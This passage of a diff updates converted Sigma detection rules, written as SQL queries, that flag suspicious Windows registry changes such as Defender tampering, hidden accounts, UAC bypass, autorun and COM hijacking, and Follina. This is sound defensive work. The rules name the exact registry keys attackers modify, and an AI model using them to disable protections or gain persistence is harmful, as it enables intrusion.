Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ "attack.defense_evasion", - 
"attack.t1574.002", - "attack.t1112" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Installers and updaters may set currently in use files for rename after a reboot." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.002" + "attack.t1112" ], 
"falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", 
- "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ - "Administrator actions" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 
'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": 
"2d9403d5-7927-46b7-8216-37ab7c9ec5e3", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1221" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.persistence" ], 
"falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "status": "experimental", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing 
registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ "attack.persistence", "attack.t1547.001" 
@@ -31183,1374 +31154,1449 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' 
OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject 
LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", - "author": "frack113", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "status": "experimental", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate admin script" + "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue 
LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue 